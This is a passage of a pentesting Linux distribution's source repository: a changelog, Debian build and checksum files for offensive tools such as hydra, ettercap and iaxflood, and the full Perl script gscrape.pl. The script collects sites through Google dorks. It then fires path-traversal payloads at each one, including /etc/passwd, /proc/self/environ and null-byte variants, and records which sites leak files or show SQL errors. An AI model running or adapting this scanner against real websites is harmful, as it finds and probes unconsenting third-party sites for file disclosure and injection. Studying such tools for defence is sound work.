46 | * Added cp-openbox-theme package
47 | * Updated menu
48 |
49 | -- stderr Wed, 22 Jan 2014 13:26:52 -0500
50 |
51 | crunchpwn (0.1-3) unstable; urgency=low
52 |
53 | * Nightly build 19-Jan-2014
54 | * Added cp-slim-theme
55 | * Added i2p, i2p-router, and libjbigi-jni
56 |
57 | -- stderr Sun, 19 Jan 2014 17:40:33 -0500
58 |
59 | crunchpwn (0.1-2) unstable; urgency=low
60 |
61 | * Nightly build 15-Jan-2014
62 | * Updated gscrape
63 | * Built pre-alpha live cd
64 |
65 | -- stderr Sat, 15 Jan 2014 15:30:20 -0500
66 |
67 | crunchpwn (0.1-1) unstable; urgency=low
68 |
69 | * Nightly build 14-Jan-2014
70 | * Synced new packages.
71 | * Works for i386/amd64 architectures
72 |
73 | -- stderr Fri, 14 Jan 2014 19:52:38 -0500
74 |
--------------------------------------------------------------------------------
/packages/crunchpwn/crunchpwn.build:
--------------------------------------------------------------------------------
1 | ### Commented entries have reasonable defaults.
2 | ### Uncomment to edit them.
3 | # Source:
4 | Section: admin
5 | Priority: extra
6 | Homepage: http://www.crunchpwn.org
7 | Standards-Version: 3.9.2
8 |
9 | Package: crunchpwn
10 | Version: 0.1
11 | Maintainer: stderr
12 | # Pre-Depends:
13 | Depends: apparmor,apparmor-profiles,arpalert,arping,arpon,autopsy,beleth,bluediving,bluelog,bokken,bully,chkrootkit,clamav,clusterd,cp-backgrounds,cp-openbox-theme,cp-slim-theme,creepy,cryptcat,darkstat,denyhosts,dns2tcp,dnsmap,dnsrecon,dnswalk,driftnet,dripper,dsniff,etherape,ettercap,exploit-db,extundelete,fcrackzip,foremost,fping,fwknop-server,gdb,gradm2,gscrape,halcyon,hexedit,hping3,hydra,i2p,i2p-router,iaxflood,ike-scan,iodine,ipsec-tools,ipwatchd,irssi,john,john-data,kismet,kismet-plugins-restricted,kolkata,lanspy,lfiautopwn,libcairo2,libfreetype6,libgdk-pixbuf2.0-0,libglib2.0-0,libgtk2.0-0,libjbigi-jni,libncurses5,libnet1,libpcap0.8,libpcre3,libssl1.0.0,libsysfs2,libtinfo5,libyaml-libyaml-perl,linux-exploit-suggester,linux-patch-grsecurity2,lsof,lynis,macchanger,maltego-tungsten-community,masscan,medusa,metasploit,missidentify,mtr,nast,ncrack,netsed,netsniff-ng,ngrep,nikto,nmap,nmapsi4,ntop,onioncat,openvpn,ophcrack,ophcrack-cli,p0f,packeth,pads,paxctl,pdfcrack,pidgin,pidgin-otr,prads,privoxy,proxychains,proxytunnel,ptunnel,pyew,pyrit,python-argparse,python-nfqueue,python-requests,python-scapy,python-twisted,pytinydns,radare2,ratproxy,readpst,reaver,redsocks,reglookup,responder,rkhunter,samdump2,safecopy,scanmem,scanssh,screen,set,shellcodecs,sipcrack,sleuthkit,slim,sniffit,socat,sqlmap,sslnuke,sslscan,sslsniff,sucrack,tcpdump,tcpick,tcpreplay,tcpslice,tcpspy,tcptraceroute,tcptrack,tcpxtract,thc-ssl-dos,tint2,tmux,tor,torchat,tor-dbg,tshark,udptunnel,unhide,unicornscan,uniscan,valgrind,valkyrie,vanguard,vbindiff,vinetto,vnstat,w3af,wapiti,weplab,wifijammer,wireshark,wolpertinger,wpscan,xprobe,xul-ext-firecookie,zarp,zlib1g,zzuf
14 | # Recommends:
15 | # Suggests:
16 | # Provides:
17 | # Replaces:
18 | Architecture: all
19 | # Copyright:
20 | Changelog: changelog
21 | # Readme:
22 | # Extra-Files:
23 | # Files:
24 | #
25 | Description: Install base #Pwn Linux extension
26 | #Pwn is a modular pentesting extension for both Debian and CrunchBang
27 | based systems. The repository is included separately and can be
28 | used to install individual packages. If you prefer to use the entire
29 | base system simply install this package to get access to customized
30 | themes, menus, and applications.
31 |
--------------------------------------------------------------------------------
/packages/dnsmap/dnsmap_0.30-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/dnsmap/dnsmap_0.30-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/dnsmap/dnsmap_0.30-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: dnsmap
3 | Binary: dnsmap
4 | Architecture: any
5 | Version: 0.30-1
6 | Maintainer: stderr
7 | Homepage: http://code.google.com/p/dnsmap
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | dnsmap deb net extra
12 | Checksums-Sha1:
13 | 9eefc56c3e111023d4dc1784df07c7ee54fba0ca 101505 dnsmap_0.30.orig.tar.gz
14 | b16878cf23fb2ec8eacfb497769826470359787c 2624 dnsmap_0.30-1.debian.tar.gz
15 | Checksums-Sha256:
16 | f51a0a0c2bc541b4dd086bc6021e83e5c0ec9d1aa93fbd1953bdc44d97fef5fd 101505 dnsmap_0.30.orig.tar.gz
17 | 5cefbaa9c76c13eb0d835a71a0c331a25dca5bf9f8825dd14b9b85bbc75d472a 2624 dnsmap_0.30-1.debian.tar.gz
18 | Files:
19 | b1d3d3c879885d803da8bab284414305 101505 dnsmap_0.30.orig.tar.gz
20 | 1814cc30a0774d82a7516b0317af6eb0 2624 dnsmap_0.30-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/dnsmap/dnsmap_0.30.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/dnsmap/dnsmap_0.30.orig.tar.gz
--------------------------------------------------------------------------------
/packages/dnsrecon/dnsrecon_0.8.5-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/dnsrecon/dnsrecon_0.8.5-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/dnsrecon/dnsrecon_0.8.5-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: dnsrecon
3 | Binary: dnsrecon
4 | Architecture: all
5 | Version: 0.8.5-1
6 | Maintainer: stderr
7 | Homepage: http://github.com/darkoperator/dnsrecon
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | dnsrecon deb net extra
12 | Checksums-Sha1:
13 | 582ff6d8166f831440d38c361585bd66da77eaca 1456672 dnsrecon_0.8.5.orig.tar.gz
14 | 5255e6f19ab1fcaf88d08882e8d5df6f56f845a8 2713 dnsrecon_0.8.5-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 77de56b4ad413b4af05f24529d50a8764b594be82997da1310041817ca55761b 1456672 dnsrecon_0.8.5.orig.tar.gz
17 | 40395b012f9a7106b2b9f99cdd5628be25575c97ed066e81045d1daec6bf3618 2713 dnsrecon_0.8.5-1.debian.tar.gz
18 | Files:
19 | 7bb45ba48fdb5476e5de4b3be54adcb1 1456672 dnsrecon_0.8.5.orig.tar.gz
20 | 129e01fa39d1829817c4d305a921a72e 2713 dnsrecon_0.8.5-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/dnsrecon/dnsrecon_0.8.5.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/dnsrecon/dnsrecon_0.8.5.orig.tar.gz
--------------------------------------------------------------------------------
/packages/dripper/dripper_1.0-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/dripper/dripper_1.0-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/dripper/dripper_1.0-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: dripper
3 | Binary: dripper
4 | Architecture: any
5 | Version: 1.0-1
6 | Maintainer: stderr
7 | Homepage: http://blackhatlibrary.net/Dripper.c
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | dripper deb net extra
12 | Checksums-Sha1:
13 | 7f8beee9b2297f432d0dac7f755427b785001e02 30387 dripper_1.0.orig.tar.gz
14 | 5d65088ae69b6edc743f67c2847f7d52c28930c5 1686 dripper_1.0-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 18092d886da5e968c3634babf91df414e85a1c3e26bbac2e75391173feeea033 30387 dripper_1.0.orig.tar.gz
17 | d1a7f0b44eb7d7abd377f412668529fdcfb5a570987249e26ce9f6d320967815 1686 dripper_1.0-1.debian.tar.gz
18 | Files:
19 | bf4b6c1d3a4b57a211c3761cb31dc0b8 30387 dripper_1.0.orig.tar.gz
20 | a0ce47e4a38ab69e0599f8a65fb186d7 1686 dripper_1.0-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/dripper/dripper_1.0.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/dripper/dripper_1.0.orig.tar.gz
--------------------------------------------------------------------------------
/packages/ettercap/ettercap_0.8.0-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/ettercap/ettercap_0.8.0-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/ettercap/ettercap_0.8.0-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: ettercap
3 | Binary: ettercap
4 | Architecture: any
5 | Version: 0.8.0-1
6 | Maintainer: stderr
7 | Homepage: https://github.com/Ettercap/ettercap/archive/v0.8.0.tar.gz
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0), cmake, libpcap-dev, libnet-dev, libpthread-workqueue-dev, zlib1g-dev, curl, libgs-dev, libncurses5-dev, libgtk2.0-dev, libcurl4-openssl-dev, bison, flex
10 | Package-List:
11 | ettercap deb net extra
12 | Checksums-Sha1:
13 | 008fca94bbd67b578699300eb321766cd41fbfff 7069131 ettercap_0.8.0.orig.tar.gz
14 | 11e7dd13a4058bd0fbcde7004ac12a06de3ad925 11665 ettercap_0.8.0-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 8013e2bbfc69af2939d8a40e6b31de5016fe75401e4b73207a0a8ac9053ac9bc 7069131 ettercap_0.8.0.orig.tar.gz
17 | 9accce8e7c3f73f9c6699f7a44d68b3ea8eaa88df592a3bc0e7b7f48b827fa34 11665 ettercap_0.8.0-1.debian.tar.gz
18 | Files:
19 | 067514bb53ff76b81d578676e2048319 7069131 ettercap_0.8.0.orig.tar.gz
20 | b5a18bf6d1b798e2991deaeabb0f227f 11665 ettercap_0.8.0-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/ettercap/ettercap_0.8.0.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/ettercap/ettercap_0.8.0.orig.tar.gz
--------------------------------------------------------------------------------
/packages/exploit-db/exploit-db_01.07.2014-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/exploit-db/exploit-db_01.07.2014-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/exploit-db/exploit-db_01.07.2014-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: exploit-db
3 | Binary: exploit-db
4 | Architecture: any
5 | Version: 01.07.2014-1
6 | Maintainer: stderr
7 | Homepage: http://www.exploit-db.com
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | exploit-db deb admin extra
12 | Checksums-Sha1:
13 | c3f3de2695d92c03a9e0bd3ba7933e16dd2ed226 560 exploit-db_01.07.2014.orig.tar.gz
14 | a1d7a5fff48aef88c68b2d48aa60f4bc77f2afa7 1656 exploit-db_01.07.2014-1.debian.tar.gz
15 | Checksums-Sha256:
16 | fa1f58c02a2d0ba64814d0d6791fdc3c7a237626d65d399d7c163bb611e8968e 560 exploit-db_01.07.2014.orig.tar.gz
17 | 473dfcd7ea32eb00e8fc3a7aed69b7d4237cfb28187d8af0aab2913548cf8856 1656 exploit-db_01.07.2014-1.debian.tar.gz
18 | Files:
19 | 0bfa897afef8a89b55ccde63f2482df9 560 exploit-db_01.07.2014.orig.tar.gz
20 | aec0da681f8c92948ecb0452126738ea 1656 exploit-db_01.07.2014-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/exploit-db/exploit-db_01.07.2014.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/exploit-db/exploit-db_01.07.2014.orig.tar.gz
--------------------------------------------------------------------------------
/packages/gscrape/gscrape.build:
--------------------------------------------------------------------------------
1 | ### Commented entries have reasonable defaults.
2 | ### Uncomment to edit them.
3 | # Source:
4 | Section: net
5 | Priority: extra
6 | Homepage: http://blackhatlibrary.net/GScrape
7 | Standards-Version: 3.9.2
8 |
9 | Package: gscrape
10 | Version: 0.1
11 | Maintainer: stderr
12 | # Pre-Depends:
13 | Depends: perl
14 | # Recommends:
15 | # Suggests:
16 | # Provides:
17 | # Replaces:
18 | Architecture: all
19 | Preinst: preinst
20 | # Copyright:
21 | # Changelog:
22 | # Readme:
23 | # Extra-Files:
24 | Files: gscrape.pl /usr/bin
25 | #
26 | Description: Google scraping script
27 | The purpose of this script is to demonstrate that one can easily
28 | create simple tools to do tedious tasks. This script requires the
29 | Google::Search perl module.
30 |
--------------------------------------------------------------------------------
/packages/gscrape/gscrape.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl
2 |
3 | # gscrape.pl
4 | #
5 | # Uses Google::Search to either iterate through a list of dorks (dorks.lst)
6 | # And then prints out a list of vulnerable sites.
7 |
8 | use Term::ANSIColor;
9 | use Getopt::Std;
10 | use HTTP::Request;
11 | use Google::Search;
12 | use LWP::UserAgent;
13 |
14 | #vars n stuff
15 | my $search;
16 | my $useragent = LWP::UserAgent->new();
17 | my $infile;
18 | my $outfile;
19 | my $searchmode;
20 | my @url_list;
21 | my @search_terms; #search terms and
22 | my @dorks; #dorks, to check if the terms have "inurl:".
23 | my @vulnsites;
24 |
25 |
26 |
27 | ##--main execution:
28 | &banner();
29 | &getOpts();
30 |
31 |
32 | if ($opt{s} || $opt{f} && $opt{o} && !$opt{h}) {
33 | &printInfo("Trying with the following settings:");
34 | &printInfo( ">>Search Mode: $searchmode");
35 | &printInfo( ">>Output file: $outfile");
36 |
37 | if ($searchmode == "single" && $searchmode != "list"){
38 |
39 | &printInfo( ">>Search Term: $search");
40 | &search_single();
41 | } else {
42 | &printInfo( ">>Search List: $infile");
43 | &search_list();
44 | }
45 |
46 |
47 | }
48 | if (!$opt{h} && !$opt{o}){
49 | &printCritical("YOU MUST SPECIFY AN OUTPUT FILE!1!one!");
50 | &printInfo("use -h flag for help");
51 | print"\n\r\nExiting..\n";
52 | }
53 |
54 |
55 |
56 |
57 |
58 |
59 | ##--subroutines:.
60 |
61 |
62 |
63 | #Search using a list of terms:
64 | sub search_list(){
65 |
66 | open FILE, "<", $infile or die $!;
67 | my @search_terms = ;
68 | my $num = @search_terms;
69 | &printInfo("Loaded $num search terms.");
70 | &printInfo("Fixing improper search terms [if any]");
71 | #iterate through the search terms, checking if they have "inurl:" if not, prepend it.
72 | for( my $int = 0; $int < $num; $int++){
73 | my $random = int(rand($num));
74 |
75 | if ( @search_terms[$random] !~ /inurl:/ ){ ##had to learn to use regex sooner or later..
76 | push(@dorks, "inurl:".@search_terms[$random]);
77 | }
78 | if ( @search_terms[$random] =~ /inurl:/){
79 | push(@dorks, @search_terms[$random]);
80 | }
81 |
82 |
83 | }
84 | print"\n";
85 | &printInfo("Retrieving search results..");
86 |
87 | #iterate through the google dorks (search terms, with 'inurl:'), and add them to the list of sites.
88 | foreach(@dorks) {
89 |
90 | $search = Google::Search->Web( query => $_ );
91 | while ( my $result = $search->next ) {
92 | if( $result->uri =~ /\=/) { #check if results have "=" in them (ex: www.site.com/index.php?page=LOLCATS)
93 | push(@url_list, $result->uri); #push result into the array
94 | &printInfo(">>".$result->uri);
95 | }
96 | }
97 | }
98 |
99 | my @lfitest = (
100 | '/etc/passwd%00',
101 | '/etc/passwd',
102 | '/proc/self/environ%00',
103 | '/proc/self/environ',
104 | '../../../../../../../../../../../../../../../proc/self/environ',
105 | '../../../../../../../../../../../../../../../proc/self/environ%00',
106 | '../../../../../../../../../../../../../../../etc/passwd',
107 | '../../../../../../../../../../../../../../../etc/passwd%00',
108 | "'"
109 | );
110 |
111 |
112 | my $lfinum = @lfitest;
113 |
114 | print"\n";
115 | &printInfo("Testing sites for vulnerabilities..");
116 |
117 |
118 |
119 | #Test the sites for vulns.
120 |
121 | foreach( @url_list ){
122 | my $index = @url_list;
123 | my $randint = int(rand($index));
124 |
125 | my $x = @url_list[$randint];
126 | $x =~ s/=.*/=/ ;
127 |
128 |
129 |
130 | for (my $i = 0; $i < $lfinum; $i++){
131 | if ( $x !~ /http:\/\// ){
132 | $x = "http://".$x;
133 | }
134 |
135 |
136 |
137 | my $request = $useragent->get($x.@lfitest[$i]);
138 | my $result = $request->content;
139 |
140 | if ($result =~ m/root:x:/i || m/HTTP_USER_AGENT/){
141 | &printVulnLFI(">>> ".$x.@lfitest[$i]);
142 | open FILE, ">>", $outfile or die $!;
143 | print FILE "[LFI VULN] >> ".$x.@lfitest[$i]."\n";
144 | close FILE;
145 | last;
146 | }
147 | if ($result =~ m/error in your/i || m/syntax/i){
148 | &printVulnSQLI(">>> ".$x.@lfitest[$i]);
149 | open FILE, ">>", $outfile or die $!;
150 | print FILE "[SQLI VULN] >> ".$x.@lfitest."'\n";
151 | close FILE;
152 | last;
153 | }
154 | if ($result =~ m/hacking/i || m/reported/i || m/recorded/i || m/malicious/i){
155 | &printCritical("> Whoops! Tripped an IDS at: ".$x." With: ".@lfitest[$i]);
156 |
157 | }
158 |
159 | }
160 | }
161 |
162 | }
163 |
164 |
165 |
166 |
167 |
168 |
169 | sub banner() {
170 | system('clear');
171 | print("\r+=====================================================================+
172 | \r| GScrape |
173 | \r| ________ _________ |
174 | \r| / _____/ / _____/ ________________ ______ ____ |
175 | \r| / \\ ___ \\_____ \\_/ ___\\_ __ \\__ \\ \\____ \\_/ __ \\ |
176 | \r| \\ \\_\\ \\/ \\ \\___| | \\// __ \\| |_> > ___/ |
177 | \r| \\______ /_______ /\\___ >__| (____ / __/ \\___ > |
178 | \r| \\/ \\/ \\/ \\/|__| \\/ |
179 | \r| |
180 | \r| |
181 | \r| Uses Google AJAX API to search for vulnerabilities |
182 | \r+=====================================================================+
183 | \r
184 | \r www.BlackhatAcademy.net
185 | " );
186 |
187 | printWarning("THE END USER IS LIABLE FOR THE USE OF THIS SOFTWARE.
188 | \rUSING THIS AGAINST ANY SYSTEM WITHOUT PERMISSION IS A CRIMINAL ACT
189 | \rTHE AUTHOR TAKES NO RESPONSIBILITY FOR THE END-USER'S ACTIONS.\n");
190 |
191 |
192 |
193 | }
194 |
195 |
196 | sub getOpts(){
197 | #option modes, and args.
198 | my $opt_string = 'f:o:h';
199 | getopts( "$opt_string", \%opt );
200 |
201 | #set vars of $outfile, and $infile if they are defined.
202 |
203 |
204 | if ($opt{o}){
205 | $outfile = $opt{o};
206 | }
207 |
208 | if ($opt{f}){
209 |
210 | $infile = $opt{f};
211 | $searchmode = "list";
212 |
213 | }
214 |
215 |
216 |
217 | #Display help page if -h
218 | usage() if $opt{h};
219 |
220 |
221 |
222 | }
223 | #YES HELLO, THIS IS HELP PAGE.
224 | sub usage(){
225 | print("
226 |
227 |
228 | GScrape Usage:
229 |
230 | Search using a list of search terms:
231 | -f /path/to/dorks.txt
232 |
233 |
234 | Define output file:
235 | -o results.out
236 |
237 |
238 |
239 |
240 | Example Usages:
241 |
242 | Run a list of search terms through the scanner:
243 | perl gscrape.pl -f ~/Dork.lst -o ~/result.out
244 |
245 |
246 | ");
247 | }
248 |
249 |
250 | #HERE BE ANSICOLOR:
251 | # [INFO] [CRITICAL] and [WARNING] messages
252 |
253 | sub printCritical(){
254 | my $error = shift(@_);
255 |
256 |
257 | print color 'bold blue';
258 | print "\r[";
259 | print color 'red';
260 | print "CRITICAL";
261 | print color 'bold blue';
262 | print "] ";
263 | print color 'red';
264 | print color 'reset';
265 | print $error."\n";
266 |
267 | }
268 | sub printWarning(){
269 |
270 | my $error = shift(@_);
271 |
272 |
273 | print color 'bold blue';
274 | print "\r[";
275 | print color 'yellow';
276 | print "WARNING";
277 | print color 'bold blue';
278 | print "] ";
279 | print color 'reset';
280 | print $error."\n";
281 |
282 | }
283 | sub printInfo(){
284 |
285 | my $info = shift(@_);
286 |
287 |
288 | print color 'bold blue';
289 |
290 | print "\r[";
291 | print color 'reset';
292 | print "INFO";
293 | print color 'bold blue';
294 | print "] ";
295 | print color 'reset';
296 | print $info."\n";
297 |
298 | }
299 |
300 | sub printVulnLFI(){
301 |
302 | my $info = shift(@_);
303 |
304 |
305 | print color 'bold blue';
306 |
307 | print "\r[";
308 | print color 'green';
309 | print "LFI VULN ";
310 | print color 'bold blue';
311 | print "] ";
312 | print color 'reset';
313 | print $info."\n";
314 |
315 | }
316 |
317 | sub printVulnSQLI(){
318 |
319 | my $info = shift(@_);
320 |
321 |
322 | print color 'bold blue';
323 |
324 | print "\r[";
325 | print color 'green';
326 | print "SQLI VULN";
327 | print color 'bold blue';
328 | print "] ";
329 | print color 'reset';
330 | print $info."\n";
331 |
332 | }
333 |
--------------------------------------------------------------------------------
/packages/gscrape/preinst:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # preinst script for ettercap
3 | #
4 | # see: dh_installdeb(1)
5 |
6 | set -e
7 |
8 | # summary of how this script can be called:
9 | # * `install'
10 | # * `install'
11 | # * `upgrade'
12 | # * `abort-upgrade'
13 | # for details, see http://www.debian.org/doc/debian-policy/ or
14 | # the debian-policy package
15 |
16 |
17 | case "$1" in
18 | install|upgrade)
19 | perl -MGoogle::Search -le 'print $INC{"Google/Search.pm"}' || (cpan -i Google::Search ; exit 0 )
20 | ;;
21 |
22 | abort-upgrade)
23 | ;;
24 |
25 | *)
26 | echo "preinst called with unknown argument \`$1'" >&2
27 | exit 1
28 | ;;
29 | esac
30 |
31 | # dh_installdeb will replace this with shell code automatically
32 | # generated by other debhelper scripts.
33 |
34 | #DEBHELPER#
35 |
36 | exit 0
37 |
--------------------------------------------------------------------------------
/packages/halcyon/halcyon_0.1-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/halcyon/halcyon_0.1-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/halcyon/halcyon_0.1-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: halcyon
3 | Binary: halcyon
4 | Architecture: all
5 | Version: 0.1-1
6 | Maintainer: stderr
7 | Homepage: http://blackhatlibrary.net/Halcyon
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | halcyon deb net extra
12 | Checksums-Sha1:
13 | 85295d50f179e175980d7bb5b15c2758dd37ad09 46083 halcyon_0.1.orig.tar.gz
14 | 0e3a4fc6b3b32fc82b13db4cb3b4522dd9e8e029 2481 halcyon_0.1-1.debian.tar.gz
15 | Checksums-Sha256:
16 | f19695858fd0de3bc6b896502442f8e823736752773e1c7799d52aac7fa9f540 46083 halcyon_0.1.orig.tar.gz
17 | c4f60beff0a1f90661422948c415be5967968e94b06f50f13f19eec563048ec6 2481 halcyon_0.1-1.debian.tar.gz
18 | Files:
19 | 302130babcdc0c2090a6da951865c356 46083 halcyon_0.1.orig.tar.gz
20 | 5d44f7820f5a85010278448850c290bf 2481 halcyon_0.1-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/halcyon/halcyon_0.1.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/halcyon/halcyon_0.1.orig.tar.gz
--------------------------------------------------------------------------------
/packages/hydra/hydra_7.6-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/hydra/hydra_7.6-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/hydra/hydra_7.6-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: hydra
3 | Binary: hydra
4 | Architecture: any
5 | Version: 7.6-1
6 | Maintainer: stderr
7 | Homepage: https://www.thc.org/thc-hydra/
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0), autotools-dev, libssl-dev, libssh-dev, libidn11-dev, libpcre3-dev, libgtk2.0-dev, libmysqlclient-dev, libpq-dev, libsvn-dev, firebird2.1-dev, libncp-dev
10 | Package-List:
11 | hydra deb net extra
12 | Checksums-Sha1:
13 | 7df230bb4f228a5cdc776ef1a215a1523b58f40b 557045 hydra_7.6.orig.tar.gz
14 | 9ce42f31348b90fc4e030ba6ed1ace3555222c2a 3441 hydra_7.6-1.debian.tar.gz
15 | Checksums-Sha256:
16 | a479bebabcb81c4a08a25f41c88688055bbb800ecfa93e25dd809ad1ff58debd 557045 hydra_7.6.orig.tar.gz
17 | 9548051aae427ad94a6e4ecb31e0422db906df72e1d7728d1a62698683b044ec 3441 hydra_7.6-1.debian.tar.gz
18 | Files:
19 | 62af688a07830d505d227bdaaeff9e0a 557045 hydra_7.6.orig.tar.gz
20 | f7604d174f48d03e768cecfe9134a1e8 3441 hydra_7.6-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/hydra/hydra_7.6.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/hydra/hydra_7.6.orig.tar.gz
--------------------------------------------------------------------------------
/packages/iaxflood/iaxflood_0.1-1.debian.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/iaxflood/iaxflood_0.1-1.debian.tar.gz
--------------------------------------------------------------------------------
/packages/iaxflood/iaxflood_0.1-1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (quilt)
2 | Source: iaxflood
3 | Binary: iaxflood
4 | Architecture: any
5 | Version: 0.1-1
6 | Maintainer: stderr
7 | Homepage: http://www.hackingexposedvoip.com/sec_tools
8 | Standards-Version: 3.9.3
9 | Build-Depends: debhelper (>= 8.0.0)
10 | Package-List:
11 | iaxflood deb admin extra
12 | Checksums-Sha1:
13 | 844a8568dc3efa5dbba40c00293089f532272bd2 10709 iaxflood_0.1.orig.tar.gz
14 | 72424b29ef101d11a5b1d708638fadb69411900e 2211 iaxflood_0.1-1.debian.tar.gz
15 | Checksums-Sha256:
16 | 2191d8e808052a44bb250c9275df25e9d54c6b592193c072af58631ed6903e81 10709 iaxflood_0.1.orig.tar.gz
17 | c9b9d8b1b242ea2e011f2021a453b742067806a559caa748d561829101fb220b 2211 iaxflood_0.1-1.debian.tar.gz
18 | Files:
19 | 39d557dcfdcab7c668ba321f4de82664 10709 iaxflood_0.1.orig.tar.gz
20 | ad4ac8a6618dbb64f711d0b60fc9446d 2211 iaxflood_0.1-1.debian.tar.gz
21 |
--------------------------------------------------------------------------------
/packages/iaxflood/iaxflood_0.1.orig.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/iaxflood/iaxflood_0.1.orig.tar.gz
--------------------------------------------------------------------------------
/packages/kismet/kismet_2013.03.1.dsc:
--------------------------------------------------------------------------------
1 | Format: 3.0 (native)
2 | Source: kismet
3 | Binary: kismet, kismet-plugins-restricted
4 | Architecture: any
5 | Version: 2013.03.1
6 | Maintainer: Mike Kershaw/Dragorn
7 | Homepage: http://www.kismetwireless.net
8 | Standards-Version: 3.9.3
9 | Vcs-Git: https://www.kismetwireless.net/kismet.git
10 | Build-Depends: debhelper (>= 8.0.0), autotools-dev, libncurses5-dev, libpcap0.8-dev (>= 1.0.0), libpcre3-dev, libcap-dev (>= 2.10), libssl-dev, libbluetooth-dev, pkg-config, libnl-3-dev | libnl-dev, libnl-genl-3-dev | libnl-dev
11 | Package-List:
12 | kismet deb net optional
13 | kismet-plugins-restricted deb net optional
14 | Checksums-Sha1:
15 | 5b4dac5cc271e547b2119c36695af01d7c4883ce 931025 kismet_2013.03.1.tar.gz
16 | Checksums-Sha256:
17 | a74b7b89ba94a4b2f51fbe48f810fa572175e73667bfb775bb7b9c3f00d22a20 931025 kismet_2013.03.1.tar.gz
18 | Files:
19 | f0256140dae12b0af60b2b19363cdc57 931025 kismet_2013.03.1.tar.gz
20 |
--------------------------------------------------------------------------------
/packages/kismet/kismet_2013.03.1.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/chokepoint/crunchpwn/724d7e59114e3ed6cc1e7357534adfdf8aa72ef8/packages/kismet/kismet_2013.03.1.tar.gz
--------------------------------------------------------------------------------
/packages/kolkata/kolkata:
--------------------------------------------------------------------------------
